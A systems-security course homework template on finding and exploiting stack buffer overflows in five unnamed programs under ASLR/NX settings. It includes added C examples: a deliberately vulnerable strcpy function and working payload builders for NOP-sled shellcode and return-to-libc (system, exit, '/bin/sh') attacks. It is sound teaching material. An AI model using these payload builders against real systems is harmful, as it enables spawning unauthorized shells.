System Security Homework
Systems Security Homework #4
Student Name:
Student ID:
Start Time:
End Time:
Part 1: Identify vulnerable programs
1. Which of the programs exhibit a buffer overflow vulnerability? Mark your answers in the table below.
Program Name | Your Answer (1 point each)
p1 | Yes/No
p2 | Yes/No
p3 | Yes/No
p4 | Yes/No
p5 | Yes/No
2. Explain how you determined your answers to the previous question.
For each program, write your explanation in the space below (add more space if needed). Include the commands you ran and screenshots as needed. (10 points: 2 points for each program)
a. Program P1:
b. Program P2:
c. Program P3:
d. Program P4:
e. Program P5:
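What separates a vulnerable program from a safe one, shown as an added C example (not one of the homework's p1..p5, which are not reproduced on this page): an unbounded strcpy() into a fixed-size stack buffer beside a bounded copy, plus the length check the vulnerable version omits. The 64-byte buffer size and the inputs are assumed values for the illustration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 64  /* assumed buffer size for this illustration */

/* Vulnerable pattern: strcpy() into a fixed-size stack buffer with no length
 * check. Any input of 64 bytes or more writes past buf, over the saved frame
 * pointer and return address. Calling this with a long string is undefined
 * behaviour by design; it is here to show what to look for. Equivalent red
 * flags when reading a program: gets(), sprintf("%s"), scanf("%s"), strcat(),
 * and read()/recv()/fgets() with a length larger than the destination. */
int vulnerable_copy(const char *input)
{
    char buf[BUF_LEN];
    strcpy(buf, input);
    return (int)strlen(buf);
}

/* Hardened version: copy at most dstlen-1 bytes, always NUL-terminate, and
 * report whether the input was truncated (1), copied whole (0) or the
 * destination was unusable (-1). */
int safe_copy(char *dst, size_t dstlen, const char *input)
{
    size_t n = strlen(input);
    if (dstlen == 0)
        return -1;
    if (n >= dstlen) {
        memcpy(dst, input, dstlen - 1);
        dst[dstlen - 1] = '\0';
        return 1;
    }
    memcpy(dst, input, n + 1);
    return 0;
}

/* Triage helper: does this input (plus its terminator) fit in a buffer of
 * buflen bytes? This is exactly the check vulnerable_copy() is missing. */
int would_overflow(size_t buflen, const char *input)
{
    return strlen(input) + 1 > buflen;
}

/* Self-check on a constructed 199-byte input: the hardened copy must report
 * truncation and leave a 63-character NUL-terminated string behind. */
int safe_copy_check(void)
{
    char dst[BUF_LEN];
    char big[200];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return safe_copy(dst, sizeof dst, big) == 1 && strlen(dst) == BUF_LEN - 1;
}

int main(int argc, char **argv)
{
    const char *in = argc > 1 ? argv[1] : "hello";
    if (would_overflow(BUF_LEN, in)) {
        printf("input of %zu bytes would overflow a %d-byte buffer\n",
               strlen(in), BUF_LEN);
        return 1;
    }
    printf("copied %d bytes\n", vulnerable_copy(in));
    return 0;
}
```

To confirm a suspected overflow dynamically rather than by reading the source, remove the would_overflow() guard in main, build with -fno-stack-protector, and run the binary under gdb with an argument of 100 or so 'A' bytes: a SIGSEGV with the instruction pointer equal to 0x41414141 shows the saved return address was overwritten, and a "stack smashing detected" abort (when the canary is left on) shows the same write happened but was caught.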
Part 2: Exploit the vulnerability
Exploit each of the programs you found vulnerable using all applicable exploit techniques.
The possible techniques are:
1. !ASLR & !NX: ASLR and NX off, by executing shellcode on the stack.
2. ASLR & !NX: ASLR on and NX off, by executing shellcode on the stack.
3. !ASLR & NX: ASLR off and NX on, using return-to-libc.
4. ASLR & NX: ASLR and NX on, using return-to-libc and a string built by your payload.
Use the text between the dashed lines (the next 2 pages) to report your exploits. Copy this text once for every vulnerable program Pi: for instance, if you found that P1, P2, and P4 are vulnerable, copy the text between the dashed lines three times, one for each program. Remember that there are N possible exploits, and you can get full credit for finding N-2.
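The four techniques above share two pieces of work: measuring the distance from the start of the input to the saved return address, and laying out the bytes that go after it. The C below is an added example, not course-provided code and not tied to any of p1..p5. It assumes a 32-bit x86 target (4-byte little-endian addresses, cdecl calling convention) and a cyclic pattern in the pattern_create style; the offset 76, the stack address 0xbffff6a0 and the libc addresses 0xf7e3b2c0, 0xf7e2e8f0 and 0xf7f5e4f2 used in layout_check() are invented stand-ins for the values you would read out of gdb, and the single 0xcc byte stands in for the studio shellcode.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Payload size: send cyclic_pattern() to the target; the crash EIP gdb reports
 * is four pattern bytes, and cyclic_offset() maps it back to the distance from
 * the start of the input to the saved return address. */
#define MAX_PATTERN (26 * 26 * 10 * 3)   /* 20280 bytes before it repeats */

size_t cyclic_pattern(char *out, size_t len)   /* out must hold len + 1 bytes */
{
    const char *U = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    const char *L = "abcdefghijklmnopqrstuvwxyz";
    const char *D = "0123456789";
    size_t n = 0;
    for (int i = 0; i < 26 && n < len; i++)
        for (int j = 0; j < 26 && n < len; j++)
            for (int k = 0; k < 10 && n < len; k++) {
                const char trip[3] = { U[i], L[j], D[k] };
                for (int t = 0; t < 3 && n < len; t++)
                    out[n++] = trip[t];
            }
    out[n] = '\0';
    return n;
}

/* eip is the value gdb printed (a little-endian load of 4 pattern bytes). */
long cyclic_offset(uint32_t eip, size_t pattern_len)
{
    static char pat[MAX_PATTERN + 1];
    if (pattern_len > MAX_PATTERN)
        pattern_len = MAX_PATTERN;
    cyclic_pattern(pat, pattern_len);
    unsigned char needle[4] = { eip & 0xff, (eip >> 8) & 0xff,
                                (eip >> 16) & 0xff, (eip >> 24) & 0xff };
    for (size_t i = 0; i + 4 <= pattern_len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;   /* not from the pattern: the overwrite did not reach EIP */
}

static void put_le32(unsigned char *p, uint32_t v)   /* 32-bit, little-endian */
{
    p[0] = v; p[1] = v >> 8; p[2] = v >> 16; p[3] = v >> 24;
}

/* NX off (techniques 1 and 2): [pad][ret -> sled][NOP sled][shellcode].
 * ret_addr is a stack address inside the sled, read from gdb; with ASLR on it
 * is a guess, and a longer sled widens the window that guess has to hit. */
size_t build_shellcode_payload(unsigned char *out, size_t offset, uint32_t ret_addr,
                               size_t sled_len, const unsigned char *sc, size_t sc_len)
{
    memset(out, 'A', offset);
    put_le32(out + offset, ret_addr);
    memset(out + offset + 4, 0x90, sled_len);        /* 0x90 = x86 NOP */
    memcpy(out + offset + 4 + sled_len, sc, sc_len);
    return offset + 4 + sled_len + sc_len;
}

/* NX on (techniques 3 and 4): [pad][&system][&exit][&"/bin/sh"]. The function
 * returns into system(), which sees exit() as its return address and the string
 * pointer as its cdecl argument. Under ASLR the addresses change per run;
 * obtaining them (leak or brute force) is outside this builder. */
size_t build_ret2libc_payload(unsigned char *out, size_t offset, uint32_t system_addr,
                              uint32_t exit_addr, uint32_t binsh_addr)
{
    memset(out, 'A', offset);
    put_le32(out + offset, system_addr);
    put_le32(out + offset + 4, exit_addr);
    put_le32(out + offset + 8, binsh_addr);
    return offset + 12;
}

/* strcpy()/argv delivery stops at NUL and fgets() at newline, so check before
 * sending. Returns the index of the first such byte, or -1 if clean. */
long first_bad_byte(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0x00 || p[i] == 0x0a)
            return (long)i;
    return -1;
}

/* Worked layout with assumed values (offset 76, invented stack and libc
 * addresses, 0xcc in place of real shellcode); 1 when every field lands
 * where the layouts above say it should. */
int layout_check(void)
{
    unsigned char buf[256];
    const unsigned char sc[1] = { 0xcc };
    size_t n1 = build_shellcode_payload(buf, 76, 0xbffff6a0u, 64, sc, sizeof sc);
    int ok = n1 == 145 && buf[76] == 0xa0 && buf[79] == 0xbf && buf[80] == 0x90
             && buf[144] == 0xcc && first_bad_byte(buf, n1) == -1;
    size_t n2 = build_ret2libc_payload(buf, 76, 0xf7e3b2c0u, 0xf7e2e8f0u, 0xf7f5e4f2u);
    return ok && n2 == 88 && buf[76] == 0xc0 && buf[83] == 0xf7 && buf[84] == 0xf2
           && first_bad_byte(buf, n2) == -1;
}
```

Typical use: write cyclic_pattern(buf, 200) to a file, run the target on it under gdb, and pass the crash EIP to cyclic_offset() to get the offset argument for the builders. The addresses for the ret2libc layout come from gdb as well (p system, p exit, and a search for "/bin/sh" in libc, or the string placed by your own payload); run first_bad_byte() on the finished payload before sending it, since an address containing 0x00 or 0x0a truncates strcpy()- or fgets()-delivered input.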
------------------------------------------ Program Pi ---------------------------------------------------------
1. !ASLR & !NX:
a. Exploit the program using this technique! (5 points)
Your answer must be a screenshot showing your payload and proving that it spawned a new shell. You can prove that you have reached a new shell by showing the shell PID before and after you run the payload (using $$), or by showing a gdb message saying that the program invoked a new shell.
Put your answer here.
b. Explain how you constructed the payload shown in ‘a’. (5 points)
Your answer should explain how you determined the payload size and how you found the addresses used in your payload. You will likely need to use gdb for that purpose. You don’t need to explain the theory behind the exploit technique, but we need to be able to reproduce your work. For instance, you don’t need to explain why you used &pop-ret(), but you need to explain how you found it. You can use the shellcode we used in the studios if one is required by the exploit technique.
Put your answer here.
2. ASLR & !NX
a. Same as ‘a’ above.
Put your answer here.
b. Same as ‘b’ above.
Put your answer here.
3. !ASLR & NX
a. Same as ‘a’ above.
Put your answer here.
b. Same as ‘b’ above.
Put your answer here.
4. ASLR & NX
a. Same as ‘a’ above.
Put your answer here.
b. Same as ‘b’ above.
Put your answer here.
------------------------------------------------------------------------------------------------------------------------------